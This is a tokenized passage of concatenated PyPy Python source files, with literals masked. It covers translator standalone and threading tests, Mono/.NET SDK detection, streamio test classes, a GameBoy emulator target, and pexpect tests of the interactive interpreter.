) <EOL> data = cbuilder . 
cmdexec ( '<STR_LIT>' ) <EOL> assert data . startswith ( '''<STR_LIT>''' <EOL> '''<STR_LIT>''' <EOL> '''<STR_LIT>''' <EOL> '''<STR_LIT>''' ) <EOL> def test_counters ( self ) : <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rpython . lltypesystem . lloperation import llop <EOL> def entry_point ( argv ) : <EOL> llop . instrument_count ( lltype . Void , '<STR_LIT:test>' , <NUM_LIT:2> ) <EOL> llop . instrument_count ( lltype . Void , '<STR_LIT:test>' , <NUM_LIT:1> ) <EOL> llop . instrument_count ( lltype . Void , '<STR_LIT:test>' , <NUM_LIT:1> ) <EOL> llop . instrument_count ( lltype . Void , '<STR_LIT:test>' , <NUM_LIT:2> ) <EOL> llop . instrument_count ( lltype . Void , '<STR_LIT:test>' , <NUM_LIT:1> ) <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . config . translation . instrument = True <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , config = t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> counters_fname = udir . join ( "<STR_LIT>" ) <EOL> os . environ [ '<STR_LIT>' ] = str ( counters_fname ) <EOL> try : <EOL> data = cbuilder . cmdexec ( ) <EOL> finally : <EOL> del os . environ [ '<STR_LIT>' ] <EOL> f = counters_fname . open ( '<STR_LIT:rb>' ) <EOL> counters_data = f . read ( ) <EOL> f . close ( ) <EOL> import struct <EOL> counters = struct . unpack ( "<STR_LIT>" , counters_data ) <EOL> assert counters == ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> ) <EOL> def test_prof_inline ( self ) : <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> py . test . 
skip ( "<STR_LIT>" ) <EOL> def add ( a , b ) : <EOL> return a + b - b + b - b + b - b + b - b + b - b + b - b + b <EOL> def entry_point ( argv ) : <EOL> tot = <NUM_LIT:0> <EOL> x = int ( argv [ <NUM_LIT:1> ] ) <EOL> while x > <NUM_LIT:0> : <EOL> tot = add ( tot , x ) <EOL> x -= <NUM_LIT:1> <EOL> os . write ( <NUM_LIT:1> , str ( tot ) ) <EOL> return <NUM_LIT:0> <EOL> from pypy . translator . interactive import Translation <EOL> t = Translation ( entry_point , backend = '<STR_LIT:c>' , standalone = True ) <EOL> t . backendopt ( inline_threshold = <NUM_LIT:100> , profile_based_inline = "<STR_LIT>" ) <EOL> exe = t . compile ( ) <EOL> out = py . process . cmdexec ( "<STR_LIT>" % exe ) <EOL> assert int ( out ) == <NUM_LIT> * <NUM_LIT> / <NUM_LIT:2> <EOL> t = Translation ( entry_point , backend = '<STR_LIT:c>' , standalone = True ) <EOL> t . backendopt ( inline_threshold = all . INLINE_THRESHOLD_FOR_TEST * <NUM_LIT:0.5> , <EOL> profile_based_inline = "<STR_LIT>" ) <EOL> exe = t . compile ( ) <EOL> out = py . process . cmdexec ( "<STR_LIT>" % exe ) <EOL> assert int ( out ) == <NUM_LIT> * <NUM_LIT> / <NUM_LIT:2> <EOL> def test_frexp ( self ) : <EOL> import math <EOL> def entry_point ( argv ) : <EOL> m , e = math . frexp ( <NUM_LIT:0> ) <EOL> x , y = math . frexp ( <NUM_LIT:0> ) <EOL> print m , x <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> data = cbuilder . cmdexec ( '<STR_LIT>' ) <EOL> assert map ( float , data . 
split ( ) ) == [ <NUM_LIT:0.0> , <NUM_LIT:0.0> ] <EOL> def test_profopt ( self ) : <EOL> def add ( a , b ) : <EOL> return a + b - b + b - b + b - b + b - b + b - b + b - b + b <EOL> def entry_point ( argv ) : <EOL> tot = <NUM_LIT:0> <EOL> x = int ( argv [ <NUM_LIT:1> ] ) <EOL> while x > <NUM_LIT:0> : <EOL> tot = add ( tot , x ) <EOL> x -= <NUM_LIT:1> <EOL> os . write ( <NUM_LIT:1> , str ( tot ) ) <EOL> return <NUM_LIT:0> <EOL> from pypy . translator . interactive import Translation <EOL> t = Translation ( entry_point , backend = '<STR_LIT:c>' , standalone = True , profopt = "<STR_LIT>" ) <EOL> t . backendopt ( ) <EOL> exe = t . compile ( ) <EOL> out = py . process . cmdexec ( "<STR_LIT>" % exe ) <EOL> assert int ( out ) == <NUM_LIT> * <NUM_LIT> / <NUM_LIT:2> <EOL> t = Translation ( entry_point , backend = '<STR_LIT:c>' , standalone = True , profopt = "<STR_LIT>" , <EOL> noprofopt = True ) <EOL> t . backendopt ( ) <EOL> exe = t . compile ( ) <EOL> out = py . process . cmdexec ( "<STR_LIT>" % exe ) <EOL> assert int ( out ) == <NUM_LIT> * <NUM_LIT> / <NUM_LIT:2> <EOL> if hasattr ( os , '<STR_LIT>' ) : <EOL> def test_os_setpgrp ( self ) : <EOL> def entry_point ( argv ) : <EOL> os . setpgrp ( ) <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> def test_profopt_mac_osx_bug ( self ) : <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> def entry_point ( argv ) : <EOL> import os <EOL> pid = os . fork ( ) <EOL> if pid : <EOL> os . waitpid ( pid , <NUM_LIT:0> ) <EOL> else : <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> return <NUM_LIT:0> <EOL> from pypy . translator . 
interactive import Translation <EOL> t = Translation ( entry_point , backend = '<STR_LIT:c>' , standalone = True , profopt = "<STR_LIT>" ) <EOL> t . backendopt ( ) <EOL> exe = t . compile ( ) <EOL> t = Translation ( entry_point , backend = '<STR_LIT:c>' , standalone = True , profopt = "<STR_LIT>" , <EOL> noprofopt = True ) <EOL> t . backendopt ( ) <EOL> exe = t . compile ( ) <EOL> def test_standalone_large_files ( self ) : <EOL> from pypy . module . posix . test . test_posix2 import need_sparse_files <EOL> need_sparse_files ( ) <EOL> filename = str ( udir . join ( '<STR_LIT>' ) ) <EOL> r4800000000 = r_longlong ( <NUM_LIT> L ) <EOL> def entry_point ( argv ) : <EOL> fd = os . open ( filename , os . O_RDWR | os . O_CREAT , <NUM_LIT:0> <NUM_LIT> ) <EOL> os . lseek ( fd , r4800000000 , <NUM_LIT:0> ) <EOL> os . write ( fd , "<STR_LIT:$>" ) <EOL> newpos = os . lseek ( fd , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> if newpos == r4800000000 + <NUM_LIT:1> : <EOL> print "<STR_LIT:OK>" <EOL> else : <EOL> print "<STR_LIT>" <EOL> os . close ( fd ) <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> data = cbuilder . cmdexec ( '<STR_LIT>' ) <EOL> assert data . strip ( ) == "<STR_LIT:OK>" <EOL> def test_separate_files ( self ) : <EOL> fname = py . path . local ( pypydir ) . join ( <EOL> '<STR_LIT>' , '<STR_LIT:c>' , '<STR_LIT:src>' , '<STR_LIT>' ) <EOL> dirname = udir . join ( "<STR_LIT>" ) . ensure ( dir = <NUM_LIT:1> ) <EOL> fname2 = dirname . join ( "<STR_LIT>" ) <EOL> fname2 . write ( """<STR_LIT>""" ) <EOL> files = [ fname , fname2 ] <EOL> def entry_point ( argv ) : <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . buildannotator ( ) . 
build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . eci = cbuilder . eci . merge ( <EOL> ExternalCompilationInfo ( separate_module_files = files ) ) <EOL> cbuilder . generate_source ( ) <EOL> makefile = udir . join ( cbuilder . modulename , '<STR_LIT>' ) . read ( ) <EOL> assert "<STR_LIT>" in makefile <EOL> assert "<STR_LIT>" in makefile <EOL> assert "<STR_LIT>" not in makefile <EOL> assert "<STR_LIT>" in makefile <EOL> assert "<STR_LIT>" in makefile <EOL> class TestMaemo ( TestStandalone ) : <EOL> def setup_class ( cls ) : <EOL> from pypy . translator . platform . maemo import check_scratchbox <EOL> check_scratchbox ( ) <EOL> from pypy . config . pypyoption import get_pypy_config <EOL> config = get_pypy_config ( translating = True ) <EOL> config . translation . platform = '<STR_LIT>' <EOL> cls . config = config <EOL> def test_profopt ( self ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> def test_prof_inline ( self ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> class TestThread ( object ) : <EOL> gcrootfinder = '<STR_LIT>' <EOL> config = None <EOL> def compile ( self , entry_point ) : <EOL> t = TranslationContext ( self . config ) <EOL> t . config . translation . gc = "<STR_LIT>" <EOL> t . config . translation . gcrootfinder = self . gcrootfinder <EOL> t . config . translation . thread = True <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> return t , cbuilder <EOL> def test_stack_size ( self ) : <EOL> import time <EOL> from pypy . module . thread import ll_thread <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rlib . 
objectmodel import invoke_around_extcall <EOL> class State : <EOL> pass <EOL> state = State ( ) <EOL> def before ( ) : <EOL> debug_print ( "<STR_LIT>" ) <EOL> ll_assert ( not ll_thread . acquire_NOAUTO ( state . ll_lock , False ) , <EOL> "<STR_LIT>" ) <EOL> ll_thread . release_NOAUTO ( state . ll_lock ) <EOL> debug_print ( "<STR_LIT>" ) <EOL> def after ( ) : <EOL> debug_print ( "<STR_LIT>" ) <EOL> ll_thread . acquire_NOAUTO ( state . ll_lock , True ) <EOL> debug_print ( "<STR_LIT>" ) <EOL> def recurse ( n ) : <EOL> if n > <NUM_LIT:0> : <EOL> return recurse ( n - <NUM_LIT:1> ) + <NUM_LIT:1> <EOL> else : <EOL> time . sleep ( <NUM_LIT> ) <EOL> return <NUM_LIT:0> <EOL> RECURSION = <NUM_LIT> <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> RECURSION = <NUM_LIT> * <NUM_LIT:1000> <EOL> def bootstrap ( ) : <EOL> recurse ( RECURSION ) <EOL> state . count += <NUM_LIT:1> <EOL> def entry_point ( argv ) : <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" ) <EOL> error = ll_thread . set_stacksize ( int ( argv [ <NUM_LIT:1> ] ) ) <EOL> assert error == <NUM_LIT:0> <EOL> s1 = State ( ) ; s2 = State ( ) ; s3 = State ( ) <EOL> s1 . x = <NUM_LIT> ; s2 . x = <NUM_LIT> ; s3 . x = <NUM_LIT> <EOL> state . ll_lock = ll_thread . allocate_ll_lock ( ) <EOL> after ( ) <EOL> state . count = <NUM_LIT:0> <EOL> invoke_around_extcall ( before , after ) <EOL> ident1 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> ident2 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> ident3 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> while True : <EOL> if state . count == <NUM_LIT:3> : <EOL> break <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> assert s1 . x == <NUM_LIT> <EOL> assert s2 . x == <NUM_LIT> <EOL> assert s3 . x == <NUM_LIT> <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> t , cbuilder = self . 
compile ( entry_point ) <EOL> for test_kb in [ <NUM_LIT:32> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] : <EOL> print >> sys . stderr , '<STR_LIT>' % ( test_kb , ) , <EOL> try : <EOL> data = cbuilder . cmdexec ( str ( test_kb * <NUM_LIT> ) ) <EOL> except Exception , e : <EOL> if e . __class__ is not Exception : <EOL> raise <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> else : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> assert data == '<STR_LIT>' <EOL> assert test_kb > <NUM_LIT:32> <EOL> break <EOL> else : <EOL> py . test . fail ( "<STR_LIT>" ) <EOL> def test_thread_and_gc ( self ) : <EOL> import time , gc <EOL> from pypy . module . thread import ll_thread <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rlib . objectmodel import invoke_around_extcall <EOL> class State : <EOL> pass <EOL> state = State ( ) <EOL> def before ( ) : <EOL> ll_assert ( not ll_thread . acquire_NOAUTO ( state . ll_lock , False ) , <EOL> "<STR_LIT>" ) <EOL> ll_thread . release_NOAUTO ( state . ll_lock ) <EOL> def after ( ) : <EOL> ll_thread . acquire_NOAUTO ( state . ll_lock , True ) <EOL> class Cons : <EOL> def __init__ ( self , head , tail ) : <EOL> self . head = head <EOL> self . tail = tail <EOL> def bootstrap ( ) : <EOL> state . xlist . append ( Cons ( <NUM_LIT> , Cons ( <NUM_LIT> , None ) ) ) <EOL> gc . collect ( ) <EOL> def entry_point ( argv ) : <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" ) <EOL> state . xlist = [ ] <EOL> x2 = Cons ( <NUM_LIT> , Cons ( <NUM_LIT> , Cons ( <NUM_LIT> , None ) ) ) <EOL> state . ll_lock = ll_thread . allocate_ll_lock ( ) <EOL> after ( ) <EOL> invoke_around_extcall ( before , after ) <EOL> ident1 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> ident2 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> gc . collect ( ) <EOL> ident3 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> ident4 = ll_thread . 
start_new_thread ( bootstrap , ( ) ) <EOL> ident5 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> while True : <EOL> gc . collect ( ) <EOL> if len ( state . xlist ) == <NUM_LIT:5> : <EOL> break <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> assert x2 . head == <NUM_LIT> <EOL> assert x2 . tail . head == <NUM_LIT> <EOL> assert x2 . tail . tail . head == <NUM_LIT> <EOL> assert x2 . tail . tail . tail is None <EOL> for i in range ( <NUM_LIT:5> ) : <EOL> assert state . xlist [ i ] . head == <NUM_LIT> <EOL> assert state . xlist [ i ] . tail . head == <NUM_LIT> <EOL> assert state . xlist [ i ] . tail . tail is None <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" % ( i + <NUM_LIT:1> ) ) <EOL> return <NUM_LIT:0> <EOL> t , cbuilder = self . compile ( entry_point ) <EOL> data = cbuilder . cmdexec ( '<STR_LIT>' ) <EOL> assert data . splitlines ( ) == [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] </s>
<s> import os . path <EOL> import platform <EOL> import py <EOL> class AbstractSDK ( object ) : <EOL> def _check_helper ( cls , helper ) : <EOL> if py . path . local . sysfind ( helper ) is None : <EOL> py . test . skip ( "<STR_LIT>" % helper ) <EOL> else : <EOL> return helper <EOL> _check_helper = classmethod ( _check_helper ) <EOL> def runtime ( cls ) : <EOL> for item in cls . RUNTIME : <EOL> cls . _check_helper ( item ) <EOL> return cls . RUNTIME <EOL> runtime = classmethod ( runtime ) <EOL> def ilasm ( cls ) : <EOL> return cls . _check_helper ( cls . ILASM ) <EOL> ilasm = classmethod ( ilasm ) <EOL> def csc ( cls ) : <EOL> return cls . _check_helper ( cls . CSC ) <EOL> csc = classmethod ( csc ) <EOL> def peverify ( cls ) : <EOL> return cls . _check_helper ( cls . PEVERIFY ) <EOL> peverify = classmethod ( peverify ) <EOL> class MicrosoftSDK ( AbstractSDK ) : <EOL> RUNTIME = [ ] <EOL> ILASM = '<STR_LIT>' <EOL> CSC = '<STR_LIT>' <EOL> PEVERIFY = '<STR_LIT>' <EOL> def get_mono_version ( ) : <EOL> from commands import getoutput <EOL> lines = getoutput ( '<STR_LIT>' ) . splitlines ( ) <EOL> parts = lines [ <NUM_LIT:0> ] . split ( ) <EOL> iversion = parts . index ( '<STR_LIT:version>' ) <EOL> ver = parts [ iversion + <NUM_LIT:1> ] <EOL> ver = ver . split ( '<STR_LIT:.>' ) <EOL> return tuple ( map ( int , ver ) ) <EOL> class MonoSDK ( AbstractSDK ) : <EOL> RUNTIME = [ '<STR_LIT>' ] <EOL> ILASM = '<STR_LIT>' <EOL> CSC = '<STR_LIT>' <EOL> PEVERIFY = '<STR_LIT>' <EOL> @ classmethod <EOL> def runtime ( cls ) : <EOL> cls . _check_helper ( '<STR_LIT>' ) <EOL> ver = get_mono_version ( ) <EOL> if ( <NUM_LIT:2> , <NUM_LIT:1> ) < ver < ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:3> ) : <EOL> return [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> return [ '<STR_LIT>' ] <EOL> def key_as_dict ( handle ) : <EOL> import _winreg <EOL> i = <NUM_LIT:0> <EOL> res = { } <EOL> while True : <EOL> try : <EOL> name , value , type_ = _winreg . 
EnumValue ( handle , i ) <EOL> res [ name ] = value <EOL> i += <NUM_LIT:1> <EOL> except WindowsError : <EOL> break <EOL> return res <EOL> def find_mono_on_windows ( ) : <EOL> if platform . system ( ) != '<STR_LIT>' : <EOL> return None <EOL> import _winreg <EOL> try : <EOL> hMono = _winreg . OpenKey ( _winreg . HKEY_LOCAL_MACHINE , "<STR_LIT>" ) <EOL> except WindowsError : <EOL> return None <EOL> mono = key_as_dict ( hMono ) <EOL> mono_version = mono . get ( '<STR_LIT>' , None ) <EOL> if mono_version is None : <EOL> return None <EOL> hMono . Close ( ) <EOL> hMono_data = _winreg . OpenKey ( _winreg . HKEY_LOCAL_MACHINE , "<STR_LIT>" % mono_version ) <EOL> mono_data = key_as_dict ( hMono_data ) <EOL> mono_dir = str ( mono_data [ '<STR_LIT>' ] ) <EOL> return os . path . join ( mono_dir , '<STR_LIT>' ) <EOL> def get_default_SDK ( ) : <EOL> if platform . system ( ) == '<STR_LIT>' : <EOL> SDK = MicrosoftSDK <EOL> mono_bin = find_mono_on_windows ( ) <EOL> if mono_bin is not None : <EOL> SDK . ILASM = os . path . join ( mono_bin , '<STR_LIT>' ) <EOL> else : <EOL> SDK = MonoSDK <EOL> return SDK <EOL> SDK = get_default_SDK ( ) </s>
<s> import py <EOL> from pypy . translator . cli . test . runtest import CliTest <EOL> from pypy . rlib . test . test_streamio import BaseTestBufferingInputStreamTests , BaseTestBufferingOutputStream , BaseTestLineBufferingOutputStream , BaseTestCRLFFilter , BaseTestBufferingInputOutputStreamTests , BaseTestTextInputFilter , BaseTestTextOutputFilter <EOL> class TestBufferingInputStreamTests ( CliTest , BaseTestBufferingInputStreamTests ) : <EOL> pass <EOL> class TestBufferingOutputStream ( CliTest , BaseTestBufferingOutputStream ) : <EOL> pass <EOL> class TestLineBufferingOutputStream ( CliTest , BaseTestLineBufferingOutputStream ) : <EOL> pass <EOL> class TestCRLFFilter ( CliTest , BaseTestCRLFFilter ) : <EOL> pass <EOL> class TestBufferingInputOutputStreamTests ( CliTest , BaseTestBufferingInputOutputStreamTests ) : <EOL> pass <EOL> class TestTextInputFilter ( CliTest , BaseTestTextInputFilter ) : <EOL> pass <EOL> class TestTextOutputFilter ( CliTest , BaseTestTextOutputFilter ) : <EOL> pass </s>
<s> import os <EOL> import py <EOL> from pypy . lang . gameboy import constants <EOL> from pypy . lang . gameboy . gameboy import GameBoy <EOL> ROM_PATH = str ( py . magic . autopath ( ) . dirpath ( ) . dirpath ( ) . dirpath ( ) ) + "<STR_LIT>" <EOL> EMULATION_CYCLES = <NUM_LIT:1> << <NUM_LIT> <EOL> def entry_point ( argv = None ) : <EOL> if len ( argv ) > <NUM_LIT:1> : <EOL> filename = argv [ <NUM_LIT:1> ] <EOL> else : <EOL> filename = ROM_PATH + "<STR_LIT>" <EOL> gameBoy = GameBoy ( ) <EOL> gameBoy . load_cartridge_file ( str ( filename ) ) <EOL> gameBoy . emulate ( EMULATION_CYCLES ) <EOL> return <NUM_LIT:0> <EOL> def target ( * args ) : <EOL> return entry_point , None <EOL> def test_target ( ) : <EOL> entry_point ( [ "<STR_LIT>" , ROM_PATH + "<STR_LIT>" ] ) </s>
<s> """<STR_LIT>""" <EOL> import py <EOL> import sys , os , re <EOL> import autopath <EOL> from pypy . tool . udir import udir <EOL> banner = sys . version . splitlines ( ) [ <NUM_LIT:0> ] <EOL> def relpath ( path ) : <EOL> curdir = py . path . local ( ) <EOL> p = py . path . local ( path ) <EOL> result = [ ] <EOL> while not p . relto ( curdir ) : <EOL> result . append ( os . pardir ) <EOL> if curdir == curdir . dirpath ( ) : <EOL> return str ( path ) <EOL> curdir = curdir . dirpath ( ) <EOL> result . append ( p . relto ( curdir ) ) <EOL> return os . path . join ( * result ) <EOL> app_main = os . path . join ( autopath . this_dir , os . pardir , '<STR_LIT>' ) <EOL> app_main = os . path . abspath ( app_main ) <EOL> _counter = <NUM_LIT:0> <EOL> def getscript ( source ) : <EOL> global _counter <EOL> p = udir . join ( '<STR_LIT>' % ( _counter , ) ) <EOL> _counter += <NUM_LIT:1> <EOL> p . write ( str ( py . code . Source ( source ) ) ) <EOL> return relpath ( p ) <EOL> demo_script = getscript ( """<STR_LIT>""" ) <EOL> crashing_demo_script = getscript ( """<STR_LIT>""" ) <EOL> class TestInteraction : <EOL> """<STR_LIT>""" <EOL> def _spawn ( self , * args , ** kwds ) : <EOL> try : <EOL> import pexpect <EOL> except ImportError , e : <EOL> py . test . skip ( str ( e ) ) <EOL> else : <EOL> version = map ( int , pexpect . __version__ . split ( '<STR_LIT:.>' ) ) <EOL> if version < [ <NUM_LIT:2> , <NUM_LIT:1> ] : <EOL> py . test . skip ( <EOL> "<STR_LIT>" % ( <EOL> pexpect . __version__ , ) ) <EOL> kwds . setdefault ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> print '<STR_LIT>' , args , kwds <EOL> child = pexpect . spawn ( * args , ** kwds ) <EOL> child . logfile = sys . stdout <EOL> return child <EOL> def spawn ( self , argv ) : <EOL> return self . _spawn ( sys . executable , [ app_main ] + argv ) <EOL> def test_interactive ( self ) : <EOL> child = self . spawn ( [ ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . 
sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( '<STR_LIT>' ) ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( '<STR_LIT>' ) ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( '<STR_LIT>' ) ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( "<STR_LIT>" ) <EOL> def test_run_script ( self ) : <EOL> child = self . spawn ( [ demo_script ] ) <EOL> idx = child . expect ( [ '<STR_LIT:hello>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . expect ( re . escape ( "<STR_LIT>" ) ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + demo_script ) ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + app_main ) ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + repr ( [ demo_script ] ) ) ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> def test_run_script_with_args ( self ) : <EOL> argv = [ demo_script , '<STR_LIT:hello>' , '<STR_LIT>' ] <EOL> child = self . spawn ( argv ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + repr ( argv ) ) ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> def test_no_such_script ( self ) : <EOL> import errno <EOL> msg = os . strerror ( errno . ENOENT ) <EOL> child = self . spawn ( [ '<STR_LIT>' ] ) <EOL> child . expect ( re . escape ( msg ) ) <EOL> def test_option_i ( self ) : <EOL> argv = [ demo_script , '<STR_LIT:foo>' , '<STR_LIT:bar>' ] <EOL> child = self . spawn ( [ '<STR_LIT>' ] + argv ) <EOL> idx = child . expect ( [ '<STR_LIT:hello>' , re . escape ( banner ) ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . expect ( re . escape ( '<STR_LIT>' + demo_script ) ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + repr ( argv ) ) ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> idx = child . expect ( [ '<STR_LIT>' , re . 
escape ( banner ) ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT:__main__>' ) <EOL> def test_option_i_crashing ( self ) : <EOL> argv = [ crashing_demo_script , '<STR_LIT:foo>' , '<STR_LIT:bar>' ] <EOL> child = self . spawn ( [ '<STR_LIT>' ] + argv ) <EOL> idx = child . expect ( [ '<STR_LIT>' , re . escape ( banner ) ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( repr ( argv ) ) ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( repr ( '<STR_LIT>' ) ) ) <EOL> def test_options_i_c ( self ) : <EOL> child = self . spawn ( [ '<STR_LIT>' , '<STR_LIT:-c>' , '<STR_LIT>' ] ) <EOL> idx = child . expect ( [ '<STR_LIT>' , re . escape ( banner ) ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . sendline ( '<STR_LIT:x>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT:__main__>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( "<STR_LIT>" ) ) <EOL> def test_options_i_c_crashing ( self ) : <EOL> child = self . spawn ( [ '<STR_LIT>' , '<STR_LIT:-c>' , '<STR_LIT>' ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> idx = child . expect ( [ '<STR_LIT>' , re . escape ( banner ) ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . sendline ( '<STR_LIT:x>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT:__main__>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( "<STR_LIT>" ) ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( repr ( '<STR_LIT>' ) ) ) <EOL> def test_atexit ( self ) : <EOL> child = self . spawn ( [ ] ) <EOL> child . 
expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> old = sys . stdin <EOL> try : <EOL> sys . stdin = child <EOL> child . sendeof ( ) <EOL> finally : <EOL> sys . stdin = old <EOL> child . expect ( '<STR_LIT>' ) <EOL> def test_pythonstartup ( self ) : <EOL> old = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> os . environ [ '<STR_LIT>' ] = crashing_demo_script <EOL> child = self . spawn ( [ ] ) <EOL> child . expect ( re . escape ( banner ) ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( '<STR_LIT>' ) ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child = self . spawn ( [ '<STR_LIT>' , demo_script ] ) <EOL> for line in [ '<STR_LIT:hello>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> idx = child . expect ( [ line , '<STR_LIT>' ] ) <EOL> assert idx == <NUM_LIT:0> <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> finally : <EOL> os . environ [ '<STR_LIT>' ] = old <EOL> def test_unbuffered ( self ) : <EOL> line = '<STR_LIT>' <EOL> child = self . spawn ( [ '<STR_LIT>' , '<STR_LIT:-c>' , line ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT:X>' ) <EOL> def 